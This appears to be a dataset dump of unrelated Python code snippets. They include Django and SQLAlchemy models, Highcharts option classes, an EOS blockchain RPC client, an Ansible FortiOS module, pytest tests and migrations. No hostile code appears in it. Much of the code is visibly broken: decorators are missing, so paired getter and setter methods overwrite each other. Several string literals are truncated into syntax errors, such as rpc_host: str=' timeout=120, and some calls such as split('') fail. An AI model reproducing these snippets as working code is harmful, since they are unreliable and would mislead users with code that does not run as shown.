code
stringlengths
281
23.7M
class EventUser(models.Model): objects = EventUserManager() created_at = models.DateTimeField(_('Created At'), auto_now_add=True) updated_at = models.DateTimeField(_('Updated At'), auto_now=True) user = models.ForeignKey(User, verbose_name=_('User'), blank=True, null=True) event = models.ForeignKey(Event, verbose_name=_('Event')) ticket = models.ForeignKey(Ticket, verbose_name=_('Ticket'), blank=True, null=True) def __str__(self): if self.user: return '{} at event:{}'.format(self.user.username, self.event) return '{}'.format(self.event) def get_ticket_data(self): if (self.ticket is None): ticket = Ticket() ticket.save() self.ticket = ticket self.save() date = self.event.eventdate_set.order_by('date').first().date return {'first_name': self.user.first_name, 'last_name': self.user.last_name, 'nickname': self.user.username, 'email': self.user.email, 'event': self.event, 'event_date': date, 'ticket': self.ticket} def attended(self): return EventUserAttendanceDate.objects.filter(event_user=self).exists() def attended_today(self): return EventUserAttendanceDate.objects.filter(event_user=self, date__date=timezone.localdate()).exists() class Meta(): unique_together = (('event', 'user'),) verbose_name = _('Event User') verbose_name_plural = _('Event Users')
class OptionPlotoptionsHistogramSonificationDefaultinstrumentoptionsMappingTremoloDepth(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMappingPan(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
_action_type(ofproto.OFPAT_ENQUEUE, ofproto.OFP_ACTION_ENQUEUE_SIZE) class OFPActionEnqueue(OFPAction): def __init__(self, port, queue_id): super(OFPActionEnqueue, self).__init__() self.port = port self.queue_id = queue_id def parser(cls, buf, offset): (type_, len_, port, queue_id) = struct.unpack_from(ofproto.OFP_ACTION_ENQUEUE_PACK_STR, buf, offset) assert (type_ == ofproto.OFPAT_ENQUEUE) assert (len_ == ofproto.OFP_ACTION_ENQUEUE_SIZE) return cls(port, queue_id) def serialize(self, buf, offset): msg_pack_into(ofproto.OFP_ACTION_ENQUEUE_PACK_STR, buf, offset, self.type, self.len, self.port, self.queue_id)
class OptionPlotoptionsColumnpyramidSonificationTracksMappingTremoloSpeed(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
def extractSeethroughtranslationWordpressCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
class WorkflowCommon(): def createExternalDumpJob(): with open('dump_job', 'w', encoding='utf-8') as f: f.write('INTERNAL FALSE\n') f.write('EXECUTABLE dump.py\n') f.write('MIN_ARG 2\n') f.write('MAX_ARG 2\n') f.write('ARG_TYPE 0 STRING\n') with open('dump_failing_job', 'w', encoding='utf-8') as f: f.write('INTERNAL FALSE\n') f.write('EXECUTABLE dump_failing.py\n') with open('dump.py', 'w', encoding='utf-8') as f: f.write('#!/usr/bin/env python\n') f.write('import sys\n') f.write("f = open('%s' % sys.argv[1], 'w')\n") f.write("f.write('%s' % sys.argv[2])\n") f.write('f.close()\n') f.write('print("Hello World")') with open('dump_failing.py', 'w', encoding='utf-8') as f: f.write('#!/usr/bin/env python\n') f.write('print("Hello Failing")\n') f.write('raise Exception') st = os.stat('dump.py') os.chmod('dump.py', (st.st_mode | stat.S_IEXEC)) st = os.stat('dump_failing.py') os.chmod('dump_failing.py', (st.st_mode | stat.S_IEXEC)) with open('dump_workflow', 'w', encoding='utf-8') as f: f.write('DUMP dump1 dump_text_1\n') f.write('DUMP dump2 dump_<PARAM>_2\n') def createErtScriptsJob(): with open('subtract_script.py', 'w', encoding='utf-8') as f: f.write('from ert import ErtScript\n') f.write('\n') f.write('class SubtractScript(ErtScript):\n') f.write(' def run(self, arg1, arg2):\n') f.write(' return arg1 - arg2\n') with open('subtract_script_job', 'w', encoding='utf-8') as f: f.write('INTERNAL True\n') f.write('SCRIPT subtract_script.py\n') f.write('MIN_ARG 2\n') f.write('MAX_ARG 2\n') f.write('ARG_TYPE 0 FLOAT\n') f.write('ARG_TYPE 1 FLOAT\n') def createWaitJob(): with open('wait_job.py', 'w', encoding='utf-8') as f: f.write('from ert import ErtScript\n') f.write('import time\n') f.write('\n') f.write('class WaitScript(ErtScript):\n') f.write(' def dump(self, filename, content):\n') f.write(" with open(filename, 'w') as f:\n") f.write(' f.write(content)\n') f.write('\n') f.write(' def run(self, number, wait_time):\n') f.write(" self.dump('wait_started_%d' % number, 'text')\n") f.write(' start = time.time()\n') f.write(' diff = 0\n') f.write(' while not self.isCancelled() and diff < wait_time: \n') f.write(' time.sleep(0.2)\n') f.write(' diff = time.time() - start\n') f.write('\n') f.write(' if self.isCancelled():\n') f.write(" self.dump('wait_cancelled_%d' % number, 'text')\n") f.write(' else:\n') f.write(" self.dump('wait_finished_%d' % number, 'text')\n") f.write('\n') f.write(' return None\n') with open('external_wait_job.sh', 'w', encoding='utf-8') as f: f.write('#!/usr/bin/env bash\n') f.write('echo "text" > wait_started_$1\n') f.write('sleep $2\n') f.write('echo "text" > wait_finished_$1\n') st = os.stat('external_wait_job.sh') os.chmod('external_wait_job.sh', (st.st_mode | stat.S_IEXEC)) with open('wait_job', 'w', encoding='utf-8') as f: f.write('INTERNAL True\n') f.write('SCRIPT wait_job.py\n') f.write('MIN_ARG 2\n') f.write('MAX_ARG 2\n') f.write('ARG_TYPE 0 INT\n') f.write('ARG_TYPE 1 INT\n') with open('external_wait_job', 'w', encoding='utf-8') as f: f.write('INTERNAL False\n') f.write('EXECUTABLE external_wait_job.sh\n') f.write('MIN_ARG 2\n') f.write('MAX_ARG 2\n') f.write('ARG_TYPE 0 INT\n') f.write('ARG_TYPE 1 INT\n') with open('wait_workflow', 'w', encoding='utf-8') as f: f.write('WAIT 0 1\n') f.write('WAIT 1 10\n') f.write('WAIT 2 1\n') with open('fast_wait_workflow', 'w', encoding='utf-8') as f: f.write('WAIT 0 1\n') f.write('EXTERNAL_WAIT 1 1\n')
def prune_empty_awards(award_tuple: Optional[tuple]=None) -> int: _find_empty_awards_sql = '\n SELECT a.id\n FROM vw_awards a\n LEFT JOIN vw_transaction_normalized tn ON tn.award_id = a.id\n WHERE tn IS NULL {}\n '.format(('AND a.id IN %s' if award_tuple else '')) _modify_subawards_sql = 'UPDATE subaward_search SET award_id = null WHERE award_id IN ({});'.format(_find_empty_awards_sql) _modify_financial_accounts_sql = '\n UPDATE financial_accounts_by_awards\n SET\n update_date = now(),\n award_id = null\n WHERE award_id IN ({});\n '.format(_find_empty_awards_sql) _delete_parent_award_sql = 'DELETE FROM parent_award WHERE award_id in ({});'.format(_find_empty_awards_sql) _prune_empty_awards_sql = 'DELETE FROM award_search WHERE award_id IN ({}) '.format(_find_empty_awards_sql) return execute_database_statement((((_modify_subawards_sql + _modify_financial_accounts_sql) + _delete_parent_award_sql) + _prune_empty_awards_sql), [award_tuple, award_tuple, award_tuple, award_tuple])
class Organization(Base, FidesBase): __tablename__ = 'ctl_organizations' organization_parent_key = Column(String, nullable=True) controller = Column(PGEncryptedString, nullable=True) data_protection_officer = Column(PGEncryptedString, nullable=True) fidesctl_meta = Column(JSON) representative = Column(PGEncryptedString, nullable=True) security_policy = Column(String, nullable=True)
def test_subscriber_signature() -> None: with pytest.raises(LabgraphError) as err: class MyNode(Node): A = Topic(MyMessage) (A) def my_subscriber(self) -> None: pass assert ("Expected subscriber 'my_subscriber' to have signature def my_subscriber(self, message: MyMessage) -> None" in str(err.value))
def markup_text(source): source = source.split('') for i in range(1, len(source), 2): source[i] = (('Expr(' + source[i]) + ')') source[i] = (('$$' + eval(source[i], pygrim.__dict__).latex()) + '$$') source = ''.join(source) source = source.split('') for i in range(1, len(source), 2): source[i] = (('Expr(' + source[i]) + ')') source[i] = (('$' + eval(source[i], pygrim.__dict__).latex()) + '$') source = ''.join(source) source = source.split('') for i in range(1, len(source), 2): source[i] = (('<tt>' + markup_source(source[i])) + '</tt>') source = ''.join(source) return source
def extractNontransblogWordpressCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None if ('WATTT' in item['tags']): return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix) return False
class Migration(migrations.Migration): dependencies = [('admin_interface', '0008_change_related_modal_background_opacity_type')] operations = [migrations.AddField(model_name='theme', name='env', field=models.CharField(choices=[('development', 'Development'), ('testing', 'Testing'), ('staging', 'Staging'), ('production', 'Production')], default='development', max_length=50, verbose_name='enviroment')), migrations.AddField(model_name='theme', name='env_visible', field=models.BooleanField(default=True, verbose_name='visible'))]
def test_opencascade_poisson(stepdata, order): (stepfile, h) = stepdata try: mh = OpenCascadeMeshHierarchy(stepfile, element_size=h, levels=2, order=order, cache=False, verbose=True) except ImportError: pytest.skip(msg='OpenCascade unavailable, skipping test') mesh = mh[(- 1)] V = FunctionSpace(mesh, 'CG', 1) u = Function(V) v = TestFunction(V) f = Constant(1) F = ((inner(grad(u), grad(v)) * dx) - (inner(f, v) * dx)) bcs = DirichletBC(V, Constant(0), 1) params = {'mat_type': 'aij', 'snes_type': 'ksponly', 'ksp_type': 'fgmres', 'ksp_max_it': 20, 'ksp_monitor_true_residual': None, 'pc_type': 'mg', 'pc_mg_type': 'full', 'mg_levels_ksp_type': 'chebyshev', 'mg_levels_pc_type': 'sor', 'mg_coarse_ksp_type': 'preonly', 'mg_coarse_pc_type': 'lu', 'mg_coarse_pc_factor_mat_solver_type': 'mumps', 'mg_coarse_mat_mumps_icntl_14': 200} solve((F == 0), u, bcs, solver_parameters=params)
class SPIMaster(_SPIPrimitive): def __init__(self, device: SerialHandler=None): super().__init__(device) self.set_parameters() def set_parameters(self, primary_prescaler: int=_PPRE, secondary_prescaler: int=_SPRE, CKE: int=_CKE, CKP: int=_CKP, SMP: int=_SMP): self._set_parameters(primary_prescaler, secondary_prescaler, CKE, CKP, SMP) def get_parameters(cls) -> Tuple[int]: return cls._get_parameters()
('the following scripts are not ran') def check_script_files_dont_exist(context): python_scripts = set(_get_fal_scripts(context)) expected_scripts = set(map(_script_filename, context.table.headings)) unexpected_runs = (expected_scripts & python_scripts) if unexpected_runs: to_report = ', '.join(unexpected_runs) assert False, f'Script files {to_report} should NOT BE present'
('calling_file, calling_module', [('tests/test_apps/app_with_cfg_groups/my_app.py', None), (None, 'tests.test_apps.app_with_cfg_groups.my_app')]) def test_app_with_config_groups__override_all_configs(hydra_restore_singletons: Any, hydra_task_runner: TTaskRunner, calling_file: str, calling_module: str) -> None: with hydra_task_runner(calling_file=calling_file, calling_module=calling_module, config_path='conf', config_name=None, overrides=['+optimizer=adam', 'optimizer.lr=10'], configure_logging=True) as task: assert ((task.job_ret is not None) and (task.job_ret.cfg == dict(optimizer=dict(type='adam', lr=10, beta=0.01)))) verify_dir_outputs(task.job_ret, overrides=task.overrides)
def test_providers_value_setting(config): a = config.a ab = config.a.b abc = config.a.b.c abd = config.a.b.d config.update({'a': {'b': {'c': 1, 'd': 2}}}) assert (a() == {'b': {'c': 1, 'd': 2}}) assert (ab() == {'c': 1, 'd': 2}) assert (abc() == 1) assert (abd() == 2)
class EosApi(): def __init__(self, rpc_host: str=' timeout=120): self.rpc_host = rpc_host self.accounts: Dict[(str, Account)] = {} self.cpu_payer: Account = None self.session = requests.Session() self.session.trust_env = False self.session.headers['User-Agent'] = 'Mozilla/5.0' self.session.request = functools.partial(self.session.request, timeout=timeout) def import_key(self, account: str, private_key: str, permission: str='active'): account = Account(account, private_key, permission) self.accounts[account.index()] = account def import_keys(self, accounts: Union[(List[Dict], List[Account])]): for item in accounts: if isinstance(item, dict): account = Account(item['account'], item['private_key'], item['permission']) elif isinstance(item, Account): account = item else: raise TypeError('unknown account type') self.accounts[account.index()] = account def set_cpu_payer(self, account: str, private_key: str, permission: str='active'): self.cpu_payer = Account(account, private_key, permission) def remove_cpu_payer(self): self.cpu_payer = None def post(self, url: str, post_data: Dict=None) -> requests.Response: resp = self.session.post(url, json=post_data) if (resp.status_code == 500): raise TransactionException('transaction error: {0}'.format(resp.text), resp) if ((resp.status_code >= 300) or (resp.status_code < 200)): raise NodeException('eos node error, bad http status code: {0}'.format(resp.status_code), resp) return resp def abi_json_to_bin(self, code: str, action: str, args: Dict) -> bytes: url = (self.rpc_host + '/v1/chain/abi_json_to_bin') post_data = {'code': code, 'action': action, 'args': args} resp = self.post(url, post_data) binargs = resp.json().get('binargs') if (binargs is None): raise NodeException('eos node error, not find binargs', resp) return bytes.fromhex(binargs) def get_info(self) -> Dict: url = (self.rpc_host + '/v1/chain/get_info') resp = self.post(url) return resp.json() def post_transaction(self, trx: Transaction, compression: bool=False, packed_context_free_data: str='') -> Dict: url = (self.rpc_host + '/v1/chain/push_transaction') post_data = {'signatures': trx.signatures, 'compression': compression, 'packed_context_free_data': packed_context_free_data, 'packed_trx': trx.pack().hex()} resp = self.post(url, post_data) return resp.json() def get_table_rows(self, post_data: Dict) -> Dict: url = (self.rpc_host + '/v1/chain/get_table_rows') resp = self.post(url, post_data) return resp.json() def make_transaction(self, trx: Dict) -> Transaction: if self.cpu_payer: trx['actions'][0]['authorization'].insert(0, {'actor': self.cpu_payer.account, 'permission': self.cpu_payer.permission}) actors = [] actions = [] for item in trx['actions']: authorization = [] for auth in item['authorization']: authorization.append(Authorization(actor=auth['actor'], permission=auth['permission'])) actor_premission = '{0}-{1}'.format(auth['actor'], auth['permission']) if (actor_premission not in actors): actors.append(actor_premission) actions.append(Action(account=item['account'], name=item['name'], authorization=authorization, data=item['data'])) trx = Transaction(actions=actions) for item in trx.actions: binargs = self.abi_json_to_bin(item.account, item.name, item.data) item.link(binargs) net_info = self.get_info() trx.link(net_info['last_irreversible_block_id'], net_info['chain_id']) signed_keys = [] for actor_premission in actors: if (actor_premission in self.accounts): private_key = self.accounts[actor_premission].private_key elif (self.cpu_payer and (actor_premission == self.cpu_payer.index())): private_key = self.cpu_payer.private_key else: continue if (private_key not in signed_keys): trx.sign(private_key) signed_keys.append(private_key) return trx def push_transaction(self, trx: Union[(Dict, Transaction)], extra_signatures: Union[(str, List[str])]=None) -> Dict: if isinstance(trx, dict): trx = self.make_transaction(trx) if extra_signatures: if isinstance(extra_signatures, str): extra_signatures = [extra_signatures] for item in extra_signatures: if (item not in trx.signatures): trx.signatures.append(item) return self.post_transaction(trx)
def main(): module_spec = schema_to_module_spec(versioned_schema) mkeyname = 'id' fields = {'access_token': {'required': False, 'type': 'str', 'no_log': True}, 'enable_log': {'required': False, 'type': 'bool', 'default': False}, 'vdom': {'required': False, 'type': 'str', 'default': 'root'}, 'member_path': {'required': False, 'type': 'str'}, 'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']}, 'state': {'required': True, 'type': 'str', 'choices': ['present', 'absent']}, 'firewall_internet_service_owner': {'required': False, 'type': 'dict', 'default': None, 'options': {}}} for attribute_name in module_spec['options']: fields['firewall_internet_service_owner']['options'][attribute_name] = module_spec['options'][attribute_name] if (mkeyname and (mkeyname == attribute_name)): fields['firewall_internet_service_owner']['options'][attribute_name]['required'] = True module = AnsibleModule(argument_spec=fields, supports_check_mode=True) check_legacy_fortiosapi(module) is_error = False has_changed = False result = None diff = None versions_check_result = None if module._socket_path: connection = Connection(module._socket_path) if ('access_token' in module.params): connection.set_option('access_token', module.params['access_token']) if ('enable_log' in module.params): connection.set_option('enable_log', module.params['enable_log']) else: connection.set_option('enable_log', False) fos = FortiOSHandler(connection, module, mkeyname) versions_check_result = check_schema_versioning(fos, versioned_schema, 'firewall_internet_service_owner') (is_error, has_changed, result, diff) = fortios_firewall(module.params, fos, module.check_mode) else: module.fail_json(**FAIL_SOCKET_MSG) if (versions_check_result and (versions_check_result['matched'] is False)): module.warn('Ansible has detected version mismatch between FortOS system and your playbook, see more details by specifying option -vvv') if (not is_error): if (versions_check_result and (versions_check_result['matched'] is False)): module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, diff=diff) else: module.exit_json(changed=has_changed, meta=result, diff=diff) elif (versions_check_result and (versions_check_result['matched'] is False)): module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result) else: module.fail_json(msg='Error in repo', meta=result)
def df(): df = pd.DataFrame({'Name': ['tom', 'nick', 'krish', 'jack'], 'City': ['London', 'Manchester', 'Liverpool', 'Bristol'], 'Age': [20, 21, 19, 18], 'Marks': [0.9, 0.8, 0.7, 0.6], 'date_range': pd.date_range('2020-02-24', periods=4, freq='T'), 'date_obj0': ['2020-02-24', '2020-02-25', '2020-02-26', '2020-02-27']}) df['Name'] = df['Name'].astype('category') return df
class TestPrivacyRequestCacheFailedStep(): def test_cache_failed_step_and_collection(self, privacy_request): privacy_request.cache_failed_checkpoint_details(step=CurrentStep.erasure, collection=paused_location) cached_data = privacy_request.get_failed_checkpoint_details() assert (cached_data.step == CurrentStep.erasure) assert (cached_data.collection == paused_location) assert (cached_data.action_needed is None) def test_cache_null_step_and_location(self, privacy_request): privacy_request.cache_failed_checkpoint_details() cached_data = privacy_request.get_failed_checkpoint_details() assert (cached_data is None)
class BrowseFlagsTests(DatabaseTestCase): def setUp(self): super().setUp() session = Session() self.user = models.User(email='', username='user') user_social_auth = social_models.UserSocialAuth(user_id=self.user.id, user=self.user) session.add(self.user) session.add(user_social_auth) self.admin = models.User(email='', username='admin') admin_social_auth = social_models.UserSocialAuth(user_id=self.admin.id, user=self.admin) self.project1 = models.Project(name='test_project', homepage=' backend='PyPI') self.project2 = models.Project(name='project2', homepage=' backend='PyPI') self.flag1 = models.ProjectFlag(reason='I wanted to flag it', user='user', project=self.project1) self.flag2 = models.ProjectFlag(reason='This project is wrong', user='user', project=self.project2) session.add_all([admin_social_auth, self.admin, self.project1, self.project2, self.flag1, self.flag2]) session.commit() mock_config = mock.patch.dict(models.anitya_config, {'ANITYA_WEB_ADMINS': [six.text_type(self.admin.id)]}) mock_config.start() self.addCleanup(mock_config.stop) self.client = self.flask_app.test_client() def test_non_admin_get(self): with login_user(self.flask_app, self.user): output = self.client.get('/flags') self.assertEqual(401, output.status_code) def test_admin_get(self): with login_user(self.flask_app, self.admin): output = self.client.get('/flags') self.assertEqual(200, output.status_code) self.assertTrue((b'I wanted to flag it' in output.data)) self.assertTrue((b'This project is wrong' in output.data)) def test_pages(self): with login_user(self.flask_app, self.admin): page_one = self.client.get('/flags?limit=1&page=1') self.assertEqual(200, page_one.status_code) self.assertTrue(((b'I wanted to flag it' in page_one.data) or (b'This project is wrong' in page_one.data))) self.assertFalse(((b'I wanted to flag it' in page_one.data) and (b'This project is wrong' in page_one.data))) def test_from_date(self): with login_user(self.flask_app, self.admin): output = self.client.get('/flags?from_date=2017-07-01') self.assertEqual(200, output.status_code) self.assertTrue((b'I wanted to flag it' in output.data)) self.assertTrue((b'This project is wrong' in output.data)) def test_from_date_future(self): with login_user(self.flask_app, self.admin): output = self.client.get('/flags?from_date=2200-07-01') self.assertEqual(200, output.status_code) self.assertFalse((b'I wanted to flag it' in output.data)) self.assertFalse((b'This project is wrong' in output.data))
def upgrade(): op.create_table('authenticationrequest', sa.Column('id', sa.String(length=255), nullable=False), sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), sa.Column('updated_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), sa.Column('connection_key', sa.String(), nullable=False), sa.Column('state', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('connection_key')) op.create_index(op.f('ix_authenticationrequest_id'), 'authenticationrequest', ['id'], unique=False) op.create_index(op.f('ix_authenticationrequest_state'), 'authenticationrequest', ['state'], unique=True)
def check_image_desc(desc, parse_full_locs=True): if ('::' not in desc): return ('', []) image_url = '' full_locs = [[], [], [], [], []] items = str(desc).split('::') for pre_item in items: item = '' if ((pre_item[:3] == 'img') and ('=' in pre_item)): item = pre_item.split('=')[1].lstrip().rstrip() else: continue if (os.path.isfile(item) and (item.split('.')[(- 1)] in ('png', 'bmp', 'jpg', 'jpeg', 'tif', 'tiff', 'webp'))): image_url = str(item) break if (image_url and parse_full_locs): for pre_item in items: item = '' if ((pre_item[:3] == 'loc') and ('=' in pre_item)): item = pre_item.split('=')[1].lstrip().rstrip() else: continue if check_is_num(item, scope=([str(i) for i in range(10)] + ['.', ',', ';', 'N'])): item_str_lst = item.split(';;') if (len(item_str_lst) == 5): for idx in range(5): loc_str_lst = item_str_lst[idx].split(';') for loc_str in loc_str_lst: if (loc_str == 'N'): full_locs[idx].append(None) else: loc = loc_str.split(',') if ((len(loc) == 2) and check_is_num(loc[0], scope=([str(i) for i in range(10)] + ['.'])) and check_is_num(loc[1], scope=([str(i) for i in range(10)] + ['.'])) and (loc[0].count('.') < 2) and (loc[1].count('.') < 2)): loc = (float(loc[0]), float(loc[1])) if ((0.0 <= loc[0] <= 1.0) and (0.0 <= loc[1] <= 1.0)): full_locs[idx].append(loc) else: return (image_url, []) else: full_locs = [[], [], [], [], []] if (full_locs[0] or full_locs[1] or full_locs[2] or full_locs[3] or full_locs[4]): break else: return (image_url, []) return (image_url, full_locs)
class OptionSeriesPictorialSonificationDefaultspeechoptionsActivewhen(Options): def crossingDown(self): return self._config_get(None) def crossingDown(self, num: float): self._config(num, js_type=False) def crossingUp(self): return self._config_get(None) def crossingUp(self, num: float): self._config(num, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def prop(self): return self._config_get(None) def prop(self, text: str): self._config(text, js_type=False)
class Migration(migrations.Migration): dependencies = [('sites', '0001_initial')] operations = [migrations.AddField(model_name='site', name='name', field=models.CharField(default='changeme', max_length=255, unique=True, verbose_name='Name'), preserve_default=False), migrations.AlterField(model_name='site', name='url', field=models.URLField(unique=True, verbose_name='URL'))]
.parametrize('test_input, expected', [('10.10.1.1', True), ('10.0.0.0', True), ('10.0.0', False), ('10.0.0.0/24', False), ('10.0.0.0/32', False), ('test', False), (10, False), (1.0, False), (True, False), ('/does/not/exist', False), ([], False), ({}, False)]) def test_ip_address_type(test_input, expected): assert (config.IP.type_check(test_input) == expected) assert (str(config.IP) == 'IPv4 or IPv6 address')
class VideoUploadSession(object): def __init__(self, video, wait_for_encoding=False, interval=3, timeout=180): self._video = video self._api = video.get_api_assured() if (video.Field.filepath in video): self._file_path = video[video.Field.filepath] self._slideshow_spec = None elif (video.Field.slideshow_spec in video): self._slideshow_spec = video[video.Field.slideshow_spec] self._file_path = None self._account_id = video.get_parent_id_assured() self._wait_for_encoding = wait_for_encoding self._start_request_manager = VideoUploadStartRequestManager(self._api) self._transfer_request_manager = VideoUploadTransferRequestManager(self._api) self._finish_request_manager = VideoUploadFinishRequestManager(self._api) self._timeout = timeout self._interval = interval def start(self): start_response = self._start_request_manager.send_request(self.getStartRequestContext()).json() self._start_offset = int(start_response['start_offset']) self._end_offset = int(start_response['end_offset']) self._session_id = start_response['upload_session_id'] video_id = start_response['video_id'] self._transfer_request_manager.send_request(self.getTransferRequestContext()) response = self._finish_request_manager.send_request(self.getFinishRequestContext()) if self._wait_for_encoding: VideoEncodingStatusChecker.waitUntilReady(self._api, video_id, interval=self._interval, timeout=self._timeout) body = response.json().copy() body['id'] = video_id del body['success'] return body def getStartRequestContext(self): context = VideoUploadRequestContext() if self._file_path: context.file_size = os.path.getsize(self._file_path) context.account_id = self._account_id return context def getTransferRequestContext(self): context = VideoUploadRequestContext() context.session_id = self._session_id context.start_offset = self._start_offset context.end_offset = self._end_offset if self._file_path: context.file_path = self._file_path if self._slideshow_spec: context.slideshow_spec = self._slideshow_spec context.account_id = self._account_id return context def getFinishRequestContext(self): context = VideoUploadRequestContext() context.session_id = self._session_id context.account_id = self._account_id if self._file_path: context.file_name = ntpath.basename(self._file_path) return context
def ext_template_cfg_string(): return f''' [nlp] lang = "en" pipeline = ["llm"] batch_size = 128 [components] [components.llm] factory = "llm" [components.llm.task] _tasks = "spacy.NER.v3" description = "This is a description" labels = ["PER", "ORG", "LOC"] [components.llm.task.examples] = "spacy.FewShotReader.v1" path = {str(((Path(__file__).parent / 'examples') / 'ner.json'))} [components.llm.task.template] = "spacy.FileReader.v1" path = {str(((Path(__file__).parent / 'templates') / 'ner.jinja2'))} [components.llm.task.normalizer] = "spacy.LowercaseNormalizer.v1" [components.llm.model] _models = "spacy.GPT-3-5.v2" '''
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMappingLowpassResonance(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
def state_transition(chain: BlockChain, block: Block) -> None: parent_header = chain.blocks[(- 1)].header validate_header(block.header, parent_header) ensure((block.ommers == ()), InvalidBlock) (gas_used, transactions_root, receipt_root, block_logs_bloom, state) = apply_body(chain.state, get_last_256_block_hashes(chain), block.header.coinbase, block.header.number, block.header.base_fee_per_gas, block.header.gas_limit, block.header.timestamp, block.header.prev_randao, block.transactions, chain.chain_id) ensure((gas_used == block.header.gas_used), InvalidBlock) ensure((transactions_root == block.header.transactions_root), InvalidBlock) ensure((state_root(state) == block.header.state_root), InvalidBlock) ensure((receipt_root == block.header.receipt_root), InvalidBlock) ensure((block_logs_bloom == block.header.bloom), InvalidBlock) chain.blocks.append(block) if (len(chain.blocks) > 255): chain.blocks = chain.blocks[(- 255):]
class Generator(lg.Node): BARPLOT_OUTPUT = lg.Topic(BarPlotMessage) LINEPLOT_OUTPUT = lg.Topic(LinePlotMessage) config: GeneratorConfig (BARPLOT_OUTPUT) async def generate_noise(self) -> lg.AsyncPublisher: while True: (yield (self.BARPLOT_OUTPUT, BarPlotMessage(domain=np.arange((self.config.num_features + 1)), range=np.random.rand(self.config.num_features)))) (await asyncio.sleep((1 / self.config.sample_rate))) (LINEPLOT_OUTPUT) async def generate__noise(self) -> lg.AsyncPublisher: while True: (yield (self.LINEPLOT_OUTPUT, LinePlotMessage(timestamp=time.time(), data=(random() * 100)))) (await asyncio.sleep((1 / self.config.sample_rate)))
def match(d, pattern, separator='.', indexes=True): if type_util.is_regex(pattern): regex = pattern elif type_util.is_string(pattern): pattern = re.sub('([\\*]{1})', '(.)*', pattern) pattern = re.sub('(\\[([^\\[\\]]*)\\])', '\\[\\g<2>\\]', pattern) regex = re.compile(pattern, flags=re.DOTALL) else: raise ValueError(f'Expected regex or string, found: {type(pattern)}') kps = keypaths(d, separator=separator, indexes=indexes) values = [d.get(kp) for kp in kps if regex.match(kp)] return values
class TestEnsurePassphrase(TestCase): def __init__(self, *args, **kwargs): super(TestEnsurePassphrase, self).__init__(*args, **kwargs) self.path = None from copr_keygen import app as mock_app self.mock_app = mock_app def target(self): return os.path.join(self.path, TEST_EMAIL) def setUp(self): self.path = tempfile.mkdtemp() self.mock_app.config['PHRASES_DIR'] = self.path def tearDown(self): shutil.rmtree(self.path) def test_file_creation(self): ensure_passphrase_exist(self.mock_app, TEST_EMAIL) assert os.path.exists(self.target) assert (os.path.getsize(self.target) > 0) def test_add_content_to_empty_file(self): open(self.target, 'w').close() assert (os.path.getsize(self.target) == 0) ensure_passphrase_exist(self.mock_app, TEST_EMAIL) assert (os.path.getsize(self.target) > 0)
class UntypableNode(BMGError): node: BMGNode node_locations: Set[FunctionCall] def __init__(self, node: BMGNode, node_locations: Set[FunctionCall]) -> None: self.node = node self.node_locations = node_locations def __str__(self) -> str: msg = 'INTERNAL COMPILER ERROR: Untypable node\n' msg += '(This indicates a defect in the compiler, not in the model.)\n' msg = f'''The model uses {a_or_an(get_node_error_label(self.node))} node. ''' msg += 'The compiler is unable to determine its type in the Bean Machine Graph' msg += ' type system.' if (len(self.node_locations) > 0): msg += '\nThe untypable node was created in function call ' msg += ', '.join(sorted((str(loc) for loc in self.node_locations))) msg += '.' return msg
